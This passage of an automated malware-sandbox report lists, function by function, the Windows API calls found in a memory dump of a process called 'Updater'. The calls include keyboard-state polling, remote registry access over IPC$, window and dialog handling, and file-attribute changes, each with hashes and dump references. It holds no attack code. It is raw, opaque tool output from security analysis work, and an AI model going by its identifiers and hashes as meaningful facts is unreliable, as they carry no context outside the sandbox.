                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B8F5DF
                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00B8F5EA
                                                                                                                                                    • IsWindow.USER32 ref: 00B8F5F6
                                                                                                                                                    • EndDialog.USER32(00000000), ref: 00B8F607
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                                    • Opcode ID: ff93833ea52903eb0ae50fc3a118b8d2e2af846af02af0cf2a57941911f79324
                                                                                                                                                    • Instruction ID: 23d33e02de56176ced3a6f5dad7a19d4fd0228ca6a135ffcb5d9181346d2d707
                                                                                                                                                    • Opcode Fuzzy Hash: ff93833ea52903eb0ae50fc3a118b8d2e2af846af02af0cf2a57941911f79324
                                                                                                                                                    • Instruction Fuzzy Hash: C92142B4200206AFE7116F61EC89A363BE9FBA4B85F144265F50693171FFBA8D44CB61
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B8F8D9
                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B8F8EF
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B8F900
                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B8F912
                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B8F923
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SendString$_wcslen
                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                    • API String ID: 2420728520-1007645807
                                                                                                                                                    • Opcode ID: e9f51b005bdc78f3fe8e1154424d75e9da4fbc08f46aea7021dc15294a34284d
                                                                                                                                                    • Instruction ID: f107a5aff0a8001dc67ada3810e1cc0e067cf2675f471aacd21928e9d587e56f
                                                                                                                                                    • Opcode Fuzzy Hash: e9f51b005bdc78f3fe8e1154424d75e9da4fbc08f46aea7021dc15294a34284d
                                                                                                                                                    • Instruction Fuzzy Hash: 5A1154215941AA79D720B666AC49EFF7BFCEBD2B00F4005B9B415920E1EEA05D45C7A0
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00B8AE4C
                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00B8AEB7
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00B8AED6
                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00B8AEED
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00B8AF1C
                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00B8AF2D
                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00B8AF59
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00B8AF67
                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00B8AF90
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00B8AF9E
                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00B8AFC7
                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00B8AFD5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                    • Opcode ID: cbce898d400e313572e0dfd3bdb71b544f9258ddba8aa7e5a82a3cc578978419
                                                                                                                                                    • Instruction ID: 1e449640f6130c0cc28d86be968aa1b67d493a0a703985dddcf10edd9a0ed0bc
                                                                                                                                                    • Opcode Fuzzy Hash: cbce898d400e313572e0dfd3bdb71b544f9258ddba8aa7e5a82a3cc578978419
                                                                                                                                                    • Instruction Fuzzy Hash: CF61F664A087882AFB34F77084517EAAFF4DF12340F0849DEC5C29B5E2DA649A4CC763
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00B86CC9
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B86CE2
                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B86D40
                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00B86D50
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B86D62
                                                                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B86DB6
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00B86DC4
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B86DD6
                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B86E18
                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00B86E2B
                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B86E41
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00B86E4E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                                    • Opcode ID: aee8abd8cf061ae4f884cf01fa902450afa3a6c481dbebeec2b797c42f040485
                                                                                                                                                    • Instruction ID: 41fb6d189cc21ccf783fd35996edc3f330090db963e3b010356d047084a7a935
                                                                                                                                                    • Opcode Fuzzy Hash: aee8abd8cf061ae4f884cf01fa902450afa3a6c481dbebeec2b797c42f040485
                                                                                                                                                    • Instruction Fuzzy Hash: 1C51F3B5B00205AFDF18DF69DD85AAEBBB5FB48311F108269F915E7290EB749D00CB60
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B3438C: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B35687,01472BD8,?,?,?), ref: 00B343EF
                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B3490C
                                                                                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00B33F4E,00000000,?,?,00B34387,?,?), ref: 00B349AB
                                                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00B788E4
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B33F4E,00000000,?,?,00B34387,?,?), ref: 00B78917
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B33F4E,00000000,?,?,00B34387,?,?), ref: 00B7892E
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B33F4E,00000000,?,?,00B34387,?,?), ref: 00B7894A
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B7895C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 641708696-0
                                                                                                                                                    • Opcode ID: 5b5319abb9c1c02bce178bce1dcb17810cc84bf7a5dc6f3b488b88e28e4699e5
                                                                                                                                                    • Instruction ID: 6d57e9209a4b592c7a6512565fa54bae414a68196cdf55e9ee40e9b201080254
                                                                                                                                                    • Opcode Fuzzy Hash: 5b5319abb9c1c02bce178bce1dcb17810cc84bf7a5dc6f3b488b88e28e4699e5
                                                                                                                                                    • Instruction Fuzzy Hash: 78618831500701DFDB299F14D988B3AB7F1FF41316F2056A9E18657AA0CBB4B890DF81
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B34E23: GetWindowLongW.USER32(?,000000EB), ref: 00B34E34
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00B34A11
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                                    • Opcode ID: f9d03ab419e10b36d8dc30a6c30f0a41de15f0f0d68bc940c88cbe313b4c5c02
                                                                                                                                                    • Instruction ID: ea550348bfdfb0304b4f8a84ef009d4f45116c144ca36d6f1b5ca2f97cfc1017
                                                                                                                                                    • Opcode Fuzzy Hash: f9d03ab419e10b36d8dc30a6c30f0a41de15f0f0d68bc940c88cbe313b4c5c02
                                                                                                                                                    • Instruction Fuzzy Hash: F441C135184604AFCB309F389C88BB93BE5EB45331F244795FAA6872E1DB71AC41DB14
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,?,00000000,?,?,00B76680,?,0000138C,?,?,?,?,00B9EFB0,?), ref: 00B8A4E5
                                                                                                                                                    • LoadStringW.USER32(00000000,?,00B76680,?), ref: 00B8A4EE
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00B76680,?,0000138C,?,?,?,?,00B9EFB0,?,?), ref: 00B8A510
                                                                                                                                                    • LoadStringW.USER32(00000000,?,00B76680,?), ref: 00B8A513
                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B8A634
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                    • API String ID: 747408836-2268648507
                                                                                                                                                    • Opcode ID: 16ad420cacfa503583e15623b53508234928c5210ce81a62905b2a0e9c9ce9ad
                                                                                                                                                    • Instruction ID: 065eff540123f763c3e48a2f12a541b59d4766302f853bec151d6aa3ab612ce3
                                                                                                                                                    • Opcode Fuzzy Hash: 16ad420cacfa503583e15623b53508234928c5210ce81a62905b2a0e9c9ce9ad
                                                                                                                                                    • Instruction Fuzzy Hash: 5D41207280011AAADB04FBE4ED96DFE77B9AF18700F5005B5F605720A2EE356F49CB61
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F
                                                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B81849
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B81865
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B81881
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B818AB
                                                                                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B818D3
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B818DE
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B818E3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                    • API String ID: 323675364-22481851
                                                                                                                                                    • Opcode ID: 6014113db908af529434c71531aa93c33a63a76e0fe2d9eb325ee7dc78e040d6
                                                                                                                                                    • Instruction ID: 8177c6851b805aea4aeaed6c307e7f32382be95ed7db1dfbc4aef792f5f5250c
                                                                                                                                                    • Opcode Fuzzy Hash: 6014113db908af529434c71531aa93c33a63a76e0fe2d9eb325ee7dc78e040d6
                                                                                                                                                    • Instruction Fuzzy Hash: 94410572C1022DABCF11EBA4EC959EEB7B8FF18750F0045B9E805A3160EB309E45CB90
                                                                                                                                                    APIs
                                                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BB49F4
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00BB49FB
                                                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BB4A0E
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00BB4A16
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BB4A21
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00BB4A2B
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00BB4A35
                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00BB4A4B
                                                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00BB4A57
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                    • String ID: static
                                                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                                                    • Opcode ID: ad745a681adcc4ffdde6f2af60038e3f9c2ae4fdd801f2d0dd529daac477b68a
                                                                                                                                                    • Instruction ID: 239119ce0b9d596fc02b3623dcdd5ab62bfa35c818a3ec4bb4200beb0306f008
                                                                                                                                                    • Opcode Fuzzy Hash: ad745a681adcc4ffdde6f2af60038e3f9c2ae4fdd801f2d0dd529daac477b68a
                                                                                                                                                    • Instruction Fuzzy Hash: 9C316031100219AFDF119FA4DC49FEB3BA9FF09714F110361FA69A61A1DBB9D810DB94
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B985AC
                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B98648
                                                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00B9865C
                                                                                                                                                    • CoCreateInstance.OLE32(00BC0CBC,00000000,00000001,00BE7C9C,?), ref: 00B986A8
                                                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B9872D
                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00B98785
                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00B98810
                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B98833
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00B9883A
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00B9888F
                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B98895
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2762341140-0
                                                                                                                                                    • Opcode ID: f4476787cdaf7045cd2508aad89cd527c12782ad48ed32741339f7b2c981618c
                                                                                                                                                    • Instruction ID: f7b1ff5443bf23e386b72c8c381c4cb0ddd79bb770117b564716187ac31e050b
                                                                                                                                                    • Opcode Fuzzy Hash: f4476787cdaf7045cd2508aad89cd527c12782ad48ed32741339f7b2c981618c
                                                                                                                                                    • Instruction Fuzzy Hash: C1C13975A00119EFCB14DFA4D884DAEBBF9FF49304B1485A8E51A9B361DB34EE41CB90
                                                                                                                                                    APIs
                                                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B80B6B
                                                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00B80BCD
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B80BDF
                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B80BFF
                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00B80C52
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B80C66
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B80C7B
                                                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00B80C88
                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B80C91
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B80CA3
                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B80CAE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                                    • Opcode ID: 118f4b9c90fb43db1fb1e92045593b8cdd1e3b40d80a8c993e9c468bc6ae7c71
                                                                                                                                                    • Instruction ID: a9fb3862c2cb9bfc21e7979608075a552fe66206f60352c9095487b1d9b60b18
                                                                                                                                                    • Opcode Fuzzy Hash: 118f4b9c90fb43db1fb1e92045593b8cdd1e3b40d80a8c993e9c468bc6ae7c71
                                                                                                                                                    • Instruction Fuzzy Hash: CC417D75E00219AFCF00EF94D8449AEBBF8FF48354F0081A9E955A7361DB74AA49CF90
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B98A68
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B98A7C
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B98A9B
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B98AB3
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B98AC9
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B98ADB
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B98B27
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B98B30
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 769691225-438819550
